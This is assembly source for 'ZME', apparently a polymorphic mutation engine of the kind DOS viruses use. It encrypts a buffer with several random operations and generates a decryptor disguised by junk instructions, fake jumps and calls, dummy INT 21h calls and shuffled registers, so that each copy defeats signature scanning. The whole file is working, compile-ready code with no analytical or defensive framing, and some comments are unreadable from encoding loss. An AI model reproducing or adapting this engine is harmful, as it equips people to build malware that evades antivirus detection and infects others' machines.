

comment ! Use "TASM /M ZME.ASM" for compile this!

                .model  tiny
                .code
include ZME.asi
include opcode.asi
display "Compiling... Please wait."
;EXSUB   equ 0        ;ᯮ짮  ணࠬ
comment #






 ZME code begins here                                                






;  ᠭ ࠢ
;  AX - IP for decryptor
;  BX - IP for crypt data //add_buf_here
;  DI - ptr to crypt data
;  CX - crypt data size
;  BP - ptr to heap // workbuffer





#

ZME            proc
                mov     [bp.datasize],cx        ; save length to crypt
                mov     [bp.sourceptr],dx       ; save offset to data to crypt
                mov     [bp.targetptr],di       ; save offset to where to put crypted stuff
                mov     [bp.initialIP],ax     ; store initial IP
                                                ;
                lea    si,[bp.cJMP_patch]
                mov     cx,0A                 ; clear the work area with 0's
                DO
                  mov     [si],ch               ;
                  inc     si                    ;
                CYCLE LU


                DO
                    call    RND_GET_THREE_BITS
                    or      al,010b     ;AL := R_DX, R_BX, R_SI, R_DI
                    cmp     al,R_DX
                CYCLE E                 ; not R_DX
                lea     bx,[bp.reg0]
                mov     cx,7
                jmp     SHORT ffound
                DO
                    DO
                        lea     si,[bp.reg0-1]
                        call    RND_GET_THREE_BITS
fill_registers:
                        inc     si
                        cmp     si,bx
                        EXIT E
                        cmp     al,R_SP
                        REPEAT E
                        cmp     al,[si]
                        jne      fill_registers
                    CYCLE
ffound:
                    mov     [bx],al
                    inc     bx
                CYCLE LU

                call    RND_GET_BYTE            ;   X < decriptor_data + initialIP
                mov     [bp.value_X],ax         ;or X > decriptor_data + initialIP + datasize + 2

                call    RND_GET_BYTE            ;   Y < decriptor_data + initialIP - X
                mov     [bp.value_Y],ax         ;or Y > decriptor_data + initialIP + datasize + 2 - X


                mov     cx,[bp.datasize]
                sub     cx,10
                DO
                    call    RND_GET
                    cmp     ax,cx
                CYCLE A
                inc     ax
                mov     [bp.value_J],ax         ;value_J := 1..datasize-0E
;--------------------------------------------------------------------------------------
                call    RND_GET_THREE_BITS           ; do the following from
                inc     ax
                call    garble_more_reg_all             ;
;
;  ZME        ENCODE CRYPT ROUTINE               
;

                mov       [bp.useregs],REG_GARBL_ALL        ;SET USED 4..6
                mov       [bp.begin_sub],0          ;DON'T ENCODE CALL BACKWARD INTO DECRYPTOR

                lea       si,[bp.dataencriptor]
                mov       cx,SIZE dataencriptor
                DO
                    mov       byte ptr [si],N0P
                    inc       si
                CYCLE LU
                mov       byte ptr [si],0C3

                call      garble_more
                mov       cl,[bp.reg0]
                call      encode_zero_reg      ;encode MOV IDX ,0

                call      garble_more
                mov       cl,[bp.reg2]        ;encode MOV TMP1, some
                call      encode_mov
                mov       [bp.start_reg2],di
                stosw

                call      garble_more
                mov       cl,[bp.reg3]        ;encode MOV TMP2, some
                call      encode_mov
                mov       [bp.start_reg3],di
                stosw


                call      garble_more
                mov       [bp.loop_top],di

                call      garble_more
                mov       ax,[bp.value_X]
                call      encode_add

                mov       cl,4; 87 or 8B
                call      encode_reg_mem
                mov       ax,[bp.value_X]
                neg       ax
                mov       [bp.add_buf_here_1],di
                push      ax                     ;-(X+1)
                stosw


                mov       cx,CRYPTLEVEL
                DO
                    push      cx
                    mov     [bp.useregs],REG_ENC_ALL        ;SET USED 1..3
                    call      encode_one_crypt
                    mov       [bp.useregs],REG_GARBL_ALL        ;SET USED 4..6
                    pop       cx
                    cmp       cx,(CRYPTLEVEL shr 1) + 1
                    DOIF E
                        call      garble_more
                        mov       ax,[bp.value_Y]
                        call      encode_add
                    DONE
                CYCLE LU
                mov       [bp.useregs],REG_GARBL_ALL        ;SET USED 4..6


                mov       cl,2; 87 or 89
                call      encode_reg_mem
                pop       ax                     ;-(X+1)
                sub       ax,[bp.value_Y]
                mov       [bp.add_buf_here_2],di
                push      ax                     ;-(X+Y)
                stosw

                call      garble_more
                pop       ax                     ;-(X+Y)
                sub       ax,[bp.value_J]        ;-(J+X+Y)
                call      encode_add

;
;                 encoding GOTO loop_top
;
                mov     [bp.useregs],REG_GARBL_ALL or MASK REG_ENC ;
                mov     al,72    ;encode JC                     ;
                call    do_cond_jmp                            ;JC
                call      many_nonbranch_garble                ;Shit
                mov       ax,[bp.datasize]                     ;
                dec       ax                                   ;
                call      encode_add                           ;ADD INDEX,value_J
                call      finish_cJMP;garble_more              ;
                                                               ;
                mov     al,74    ;encode JZ                     ;JZ
                call    do_cond_jmp                            ;
                call    many_nonbranch_garble                  ;Shit
;;
;  ENCODE JMP NEAR Loop_Top                                    ;
;;
                                                                              ;
                call    encode_jmp_near

                mov     ax,[bp.loop_top]
                xor     bx,bx
                xchg    bx,[bp.nJMP_patch]
                add     [bx],ax



;;
                mov       [bp.useregs],REG_ALL        ;;SET USED 0..6
                call      finish_cJMP;garble_more              ;
                call      garble_more                          ;
;;
                                                               ;

;                ret
;encode_routine  endp
;
;  ZME   END OF ENCODE CRYPT ROUTINE             
;

;




;--------------------------------------------------------------------------------------
                call    RND_GET_THREE_BITS           ; do the following from
                inc     ax
                call    garble_more_reg_all             ;
;--------------------------------------------------------------------------------------

                DO
                    mov     ax,di                   ; pad the decryptor out to the
                    sub     ax,[bp.targetptr]       ; nearest paragraph
                    and     al,0F                   ; do we need to?
                    EXIT Z                          ; no, we are done
                    cmp     al,0C                   ; otherwise, still a lot to go?
                    DOIF BE                         ; no, do one byte at a time
                        call    not_branch_garble       ; else do a nonbranching
                    DOELSE                          ; instruction
                        call    do_one_byte             ;do a random one byte padding instruction
                    DONE
                CYCLE
                mov     ax,di
                sub     ax,[bp.targetptr]
                mov     [bp.decryptor_size],ax
;                mov     cx,ax
                add     ax,[bp.initialIP]
                mov     bx,[bp.add_buf_here_1]
                add     word ptr [bx],ax
                mov     bx,[bp.add_buf_here_2]
                add     word ptr [bx],ax

;                retn
                ; CX - decryptor size

;                mov     ax,[bp.decryptor_size]  ;
;                ret

                cld
                push    di
                mov     si,[bp.sourceptr]
                mov     cx,[bp.datasize]
                rep     movsb
                pop     di


                ;
                ; DI - pointer to crypt data
                ;
                ;
                ;
;encrypt         proc
;ret
                mov     si,[bp.datasize]
                dec     si
                xor     bx,bx
                call    RND_GET
                xchg    ax,cx
                call    RND_GET
                xchg    ax,dx
                IF dataencriptor NE 0
                    push    bp
                    lea     bp,[bp.dataencriptor]
                    DO
                    add     bx,word ptr [bp.value_J-dataencriptor]
                ELSE
                    DO
                    add     bx,[bp.value_J]
                ENDIF
                    sub     bx,si
                    DOIF C
                        add     bx,si
                    DONE
                    mov     ax,[di][bx]
                    call    bp      ;call encryptor
                    mov     [di][bx],ax
                    and     bx,bx
                CYCLE NZ
                IF dataencriptor NE 0
                    pop     bp
                ENDIF

                mov     si,[bp.start_reg2]
                mov     word ptr [si],cx
                mov     si,[bp.start_reg3]
                mov     word ptr [si],dx


                add     di,[bp.datasize]        ; DI-ptr do end crypt data
;many_shit:
;                call    RND_GET_BYTE
;shit_AX_bytes:
;                xchg    cx,ax
;                DO
;                    call    RND_GET_BYTE
;                    stosb                       ;add any shit after crypt data
;                CYCLE LU
;
                mov     ax,[bp.decryptor_size]  ;
                add     ax,[bp.datasize]        ; AX-return code "all size"
                retn                            ; DI-ptr do end crypt data
ZME            endp
;encrypt         endp
;



;
encode_zero_reg  proc    ;cl-register result - 2 byte stored
                 call RND_GET_BYTE
                 and      al,0A
                 add      al,29
                 stosb            ;store SUB | XOR R,R : 29, 2Bh, 31, 33
                 mov      al,9    ;cl-register
                 mul      cl
                 or       al,MASK M0D
                 stosb
                 ret
encode_zero_reg  endp
;


shit    proc
        call RND_GET_THREE_BITS
        inc  ax
        xchg    cx,ax
        DO                              ;1 to 4 times
            call    RND_GET_BYTE
            stosb                       ;add any shit after crypt data
        CYCLE LU
        ret
shit    endp



;
encode_mov      proc    ;cl-register; result - 1..4 byte stored
call    RND_GET_BYTE
ror     al,1
DOIF C
    call     encode_zero_reg
    STO_BYTE 81     ;store ADD | OR  R,value
    call     RND_GET_BYTE
    MASKA    al,1100x000         ;al=C0, C8
DOELSE
    ror     al,1
    mov     al,0B8      ;MOV R,value  db B8;
    DOIF C
        STO_BYTE 0C7
        mov      al,MASK M0D ;             db C7, C0
    DONE
DONE
or      al,cl
stosb
ret
encode_mov      endp
;




;
encode_reg_mem  proc    ;al-register
                call      garble_more
                call    RND_GET_BYTE
                and     al,cl           ;cl=2- 87 or 89   mov r,[]
                add     al,87h;b        ;cl=4- 87 or 8B   mov [],r
                mov     ah,[bp.reg1]
                shl     ah,REG
                or      ah,[bp.reg0]
                or      ah,10000100b
                cmp     [bp.reg0],R_BX
                DOIF NE
                   and     ah,11111101b
                DONE
                stosw
                ret
encode_reg_mem  endp
;

;
encode_add      proc    ;al-value, add reg0, value
                push    ax
                mov     al,[bp.reg0]
                add     al,0C0h
                mov     ah,al
                mov     al,81h
                stosw
                pop     ax
                stosw
                ret
encode_add      endp
;




;
;stosb_garble_more: stosb
;
garble_more_reg_all proc
                mov     [bp.useregs],REG_ALL  ;SET USED all registers
                xchg    cx,ax                   ;
                DO
                    call    garble_more
                IFNDEF USE21INCYCLE

                    call    RND_GET_THREE_BITS                 ;
                    cmp     al,4
                    DOIF A                              ;  encode a dummy int 21
                        xchg    si,ax                  ;
                        mov     ah,int21fcns[si]        ;value for mov ah,XX
                        mov     al,0B4                  ;mov ah,XX
                        stosw                           ;
                        STO_TWO_BYTE 0CDh, 21           ;store int 21
                    DONE
                ENDIF
                CYCLE LU
                ret
garble_more_reg_all endp
;









;
;  ZME        ENCODE ONE CRYPT OPERATION         
;
encode_one_crypt proc
        DO
            call    RND_GET_BYTE
            and     al,00001110b
            cmp     al,[bp.lastgarble]
        CYCLE E
force_choice_crypt_operation:
        mov     [bp.lastgarble],al

        xchg    ax,bx
        mov     cx,word ptr encrypt_opcode_table[bx]
        neg     bl
        add     bl,sizeof_encrypt_opcode_table-2
        mov     dx,word ptr encrypt_opcode_table[bx]

        and     cl,not 1        ;clear size data flag
        and     dl,not 1        ;clear size data flag
        call    RND_GET_BYTE
        and     al,ch                   ; patch it into the top
        and     al,3                    ; this line unnecessary
        or      cl,al                   ; byte for variable opcodes
        or      dl,al                   ; byte for variable opcodes
        and     dh,not MASK R_M
        and     ch,not MASK R_M
        DOIF Z
            call    choose_register
            mov     ah,[bp.lastchoose] ;lastchoose=1, 2, 3  -1  ax, cx, dx,
            dec     ah    ;al=lastchoose(1,2,3)+(0,4)-1= (0,1,2) or (4,5,6)
            shl     ax,REG
            or      ch,al
            or      dh,ah
            IF CRYPTLEVEL GT 8
                ;;;;;;;;IF YOU HAVE ANY TROUBLE - UNCOMMENT THIS;
                and     [bp.useregs],not MASK REG_ENC        ;SET USED 2..3
                ;do not reg1 in r/m field if use two register
            ENDIF
            test    cl,1
            DOIF NZ
                and     dh,11011011b    ;don't use BP, SI, DI
            DONE
        DONE
        call    choose_register
        or      ch,al
        or      ch,MASK M0D            ;no use memory
        or      dh,[bp.lastchoose]
        dec     dh
        or      dh,MASK M0D            ;no use memory
        mov     ax,cx
        test    cl,1
        DOIF NZ
            and     dh,11111011b    ;don't use BP, SI, DI
            or      dl,1
        DONE
        stosw
        sub     si,4
        mov     word ptr [si],dx
        test    cl,01111110b    ;al - high byte of opcode = ch
        DOIF Z
            call    RND_GET
            stosw
            cmp     cl,81h  ;16 bit
            DOIF NE
                dec     di
                mov     ah,N0P
            DONE
            mov     word ptr [si][2],ax
        DONE
        mov       [bp.useregs],REG_GARBL_ALL
;
;garble_more_without_call:
;        mov       [bp.begin_sub],0          ;DON'T ENCODE CALL INTO DECRYPTOR
;
garble_more:
        push    si cx
        call    RND_GET_THREE_BITS
        and     al,not 4
        xchg    cx,ax
;        inc     cx
        inc     cx              ;garble count = 1..4
        DO
            push    cx                      ; save garble count
            call    garble_once             ; garble ***MACRO***
            pop     cx                      ; restore garble count
        CYCLE LU
        call    finish_cJMP             ; if so, finish it
        call    many_nonbranch_garble   ; garble garble
        mov     bx,[bp.nJMP_patch]      ; check if pending nJMP
        and     bx,bx
        DOIF NZ
            call    encode_RETN          ; encode a RETN
            call    shit
            add     [bx],di
            mov     bx,[bp.end_of_jmp]
            mov     [bp.begin_sub],bx
            mov     word ptr [bp.nJMP_patch],0
            call    many_nonbranch_garble   ; garble
        DONE

        pop     cx si
        retn
encode_one_crypt endp
;




;
many_nonbranch_garble proc
                call    RND_GET_THREE_BITS           ; do large instruction
                inc     ax
                xchg    cx,ax
                DO
                    call    not_branch_garble_with_save_cx
                CYCLE LU
                retn
many_nonbranch_garble endp
;




;
choose_register proc
                call    choose_word_register
                test    cl,1                    ; byte or word register?
                DOIF Z                          ; if word, we are okay
                    cmp     al,R_SP
                    DOIF AE                          ; is a SI, DI, BP,
                        pop     bx
                    DONE
                    and     ah,4                    ; change xL to xH
                    or      al,ah                   ; make either byte or word register
                DONE
                ret
choose_register endp
;



;
choose_word_register proc
;
; 1..3 - crypt   registers
; 4..6 - garbage registers
; 0..6 - all     registers
;useregs        01111111b
;                "1" - possible use reg6..reg0
                DO
                    mov     bl,[bp.useregs]
                    call    RND_GET_THREE_BITS            ; get random number
                    xchg    cx,ax
                    shr     bl,cl
                    xchg    cx,ax
                    REPEAT NC
                    dec     ax
                    cmp     al,[bp.lastchoose]
                CYCLE E
                mov     [bp.lastchoose],al
                lea     bx,[bp.reg0]
                xlat                            ; get the register number
                                                ; al=0..3, 5..7
                ret
choose_word_register endp
;


;----------------------------------------------------------------------------
;----------------------------------------------------------------------------


;
garble_once     proc
    call    RND_GET
    cmp     al,010
    DOIF B
do_one_byte:
        call    choose_register
        cmp     al,R_AX
        lea     bx,onebyte_table
        DOIF E                           ; if possible use AX as garbage
           lea     bx,onebyte_table_ax
        DONE
        call    RND_GET_THREE_BITS
        xlat
        cmp     al,40
        GOIN E
        cmp     al,48                   ; DEC or INC ??
        DOIF E                         ; all other onebyte command have opcode great 48h
            xchg    cx,ax
            call    choose_word_register
            add     al,cl
        DONE
        stosb
        retn
    DONE


    IFDEF USE21INCYCLE
    cmp     al,020
    PASS A
        call    choose_register
        cmp     al,R_AX
;                    call    RND_GET_THREE_BITS                 ;
;                    cmp     al,4
                    DOIF E                              ;  encode a dummy int 21
                        STO_BYTE 0B4                  ;mov ah,XX
                        lea     bx,int21fcns
                        call    RND_GET_THREE_BITS                 ;
                        xlat
                        stosb
                        STO_TWO_BYTE 0CDh, 21           ;store int 21
                        ret
                    DONE
    ENDIF



    ror      ah,1                       ;random ah.bit0
    DOIF C
        cmp     word ptr [bp.cJMP_patch],0 ; is there an unfinished
        DOIF Z
            ror      ah,1               ;random ah.bit1
            DOIF C
            IFNDEF EXSUB
                    cmp     word ptr [bp.nJMP_patch],0 ; is there an unfinished
                    EXIT NZ
            ENDIF
                ror      ah,1           ;random ah.bit2
                DOIF C
;
encode_jmp_near:
            IFDEF EXSUB
                    cmp     word ptr [bp.nJMP_patch],0 ; is there an unfinished
                    EXIT NZ
            ENDIF
                    call    RND_GET_BYTE
                    and     al,110b
                    push    ax
                    DOIF NZ
                        call    choose_word_register        ;register for offset loop_top
                        xchg    cx,ax
                        call    encode_mov             ;al-register, cx-value
                        mov     [bp.nJMP_patch],di      ; save location to patch
                        xor     ax,ax
                        call    setup_reg
                    DONE
                    pop     bx
                    call    jmp_table[bx]
                    call    shit
                    mov     [bp.end_of_jmp],di
                    jmp     not_branch_garble
;
                DONE
;
                cmp     word ptr [bp.begin_sub],0 ; is there one pending?
                EXIT Z                             ; encode cond jmp
                and     ah,1
                DOIF C
                    STO_BYTE 0E8                       ; call near
                    mov     ax,[bp.begin_sub]      ; calculate CALL offset
                    sub     ax,di
                    dec     ax
                    dec     ax
                DOELSE
                    call    choose_word_register        ;register for offset loop_top
                    xchg    cx,ax
                    call    encode_mov             ;al-register, cx-value
                    mov     ax,[bp.begin_sub]
                    call    setup_reg
                    mov     ax,0D0FF                        ; encode CALL register
                    or      ah,cl                           ;
                DONE
                stosw                                   ;
                retn
;
            DONE
;
            MASKA   al,0111xxxx              ; encode a conditional jmp
            push    ax                       ; opcode 70..7F
            call    choose_word_register
            cmp     al,R_CX
            pop     ax
            DOIF E                          ; if possible use CX as garbage
                MASKA   al,111000xx         ; encode a conditional loop/jcxz
            DONE                            ; opcode E0..E3
do_cond_jmp:
            stosb
            mov     [bp.cJMP_patch],di      ; save target offset
            stosb
            retn
;
        DONE
;
; finish_cJMP simply encodes a few instructions between the conditional
; jmp and its target, and then sets the destination of the jmp to be after
; the inserted instructions.
;
finish_cJMP:;     proc
        DO
            mov     ax,di                   ; get current location
            mov     bx,[bp.cJMP_patch]      ; get previous location
            and     bx,bx                   ; in not open cJmp
            JZ      @@retn                  ; cJMP_patch == 0? i.e. is
            sub     ax,bx                   ; there an unfinished cJMP?
            dec     ax                      ; calculate offset
            EXIT NZ
            call    not_branch_garble       ; fill in some instructions
        CYCLE
        cmp     al,7F                   ; are we close enough?
        DOIF A                          ; if so, finish this now
            mov     al,0                ; if not, encode cJMP $+2
        DONE
        mov     [bx],al                 ; patch the cJMP destination
        mov     word ptr [bp.cJMP_patch],0 ; clear usage flag
@@retn:
        retn
    DONE


not_branch_garble:
    DO
        call    RND_GET_BYTE        ; mostly do larger instructions
        and     al,00111110b        ; normalise random number
        cmp     al,[bp.lastgarble]  ; is it the same as before?
    CYCLE E                         ; then try again, since we
                                    ; don't want two of the same
                                    ; sort in a row
    mov     [bp.lastgarble],al      ; else remember this one

    add     ax,offset garble_table  ; and process it
    xchg    si,ax
    mov     cx,[si]
    and     cl,not 1
    call    RND_GET_BYTE
    and     al,ch                   ; patch it into the top
    and     al,3                    ; this line unnecessary
    or      cl,al                   ; byte for variable opcodes
                                    ; (e.g. allows byte & word forms of
                                    ; opcode to use the same table entry)
    lea     bx,[bp.reg0]
    and     ch,not MASK R_M            ; clear bottom 3 bits
    DOIF Z
        call    RND_GET_BYTE      ; MOD      ; and register operation
        and     al,MASK M0D           ; clear all but top 2 bits
        or      ch,al                   ; fill in the field
        rol     al,2
        mov     dl,al           ;dl=mod

        cmp     al,11b                  ;if use two register
        DOIF B
            and     cl,not 1            ; if use memory change to byte data "byte sized"
        DONE                            ; for not MOV AX,[FFFF] ?
        call    RND_GET_BYTE       ;R/M      ; generate the registers to use
        and     al,MASK R_M            ; in memory access,i.e. [bx+si]
        or      ch,al                   ; patch into 2nd byte of instr
        cmp     al,110b                 ;R/M=6   ; +2 byte, address in memory
        DOIF E
            mov     dl,2                    ;and do not use BP as base register
            and     ch,not MASK M0D            ;mod := 0,
        DONE
        call    choose_register
        test    byte ptr [si],00000100b   ; can we use any register?
        DOIF NZ
            call    RND_GET_THREE_BITS
        DONE
        shl    al,REG                    ; move register into the reg field
    DOELSE
        call    choose_register         ; mov/add/sub/xor/and/or R,XXXX
        xor     dl,dl                   ; no data bytes
        test    byte ptr [si],1
        DOIF Z                          ; if shift, not, neg inctruction
            inc     dx                      ; assume byte
            test    cl,1                    ; byte or word of data?
            DOIF NZ                         ; continue if so
                inc     dx                      ; INC DX is better!!!
            DONE
        DONE
    DONE
    or      ch,al                   ; combine data
    xchg    cx,ax                   ; move it to the right register
    stosw                           ; write the instruction
    and     dl,dl                   ; needs data bytes?
    DOIF NZ
        cmp     dl,3                    ; check length of instruction
        DOIF NE
            call    RND_GET_BYTE                      ; keep the random number
            stosb                           ; write the byte
            dec     dl                      ; decrement bytes to write
        CYCLE NZ
    DONE
    retn
garble_once endp
;



;
setup_reg       proc
                add     ax,[bp.initialIP]
                sub     ax,[bp.targetptr]
                stosw
not_branch_garble_with_save_cx:
                push cx
                call   not_branch_garble
                pop  cx
                ret
setup_reg       endp
;




;
jmp_table       dw      jmp_e9, jmp_reg, jmp_retn, jmp_retf
;
jmp_e9:                                                 ;
                STO_BYTE 0E9                            ;
                mov     [bp.nJMP_patch],di              ; save location to patch
                lea     ax,[di+2]                       ;
                neg     ax                              ;
                stosw                                   ;
                retn                                    ;
;----------------------------------------------------------------------------
jmp_retn:       mov     al,50                           ; encode PUSH reg
                or      al,cl                           ;
                stosb                                   ;
                call    many_nonbranch_garble           ; garble
encode_RETN:                                            ;
                STO_BYTE 0C3                            ; encode a RETN
                retn                                    ;
;----------------------------------------------------------------------------
jmp_retf:       STO_BYTE 0E                             ; encode PUSH CS
                call    jmp_retn                        ;
                sub     byte ptr [di][-1],0c3-0CBh      ; change RETN to RETF
                retn                                    ;
;----------------------------------------------------------------------------
jmp_reg:        mov     ax,0E0FF                        ; encode JMP register
                or      ah,cl                           ;
                stosw                                   ;
                retn                                    ;
;



;include randomiz.asi
Opcode_Table

ZME_END:

data_area       db       SIZE workbuffer dup (?)

                end

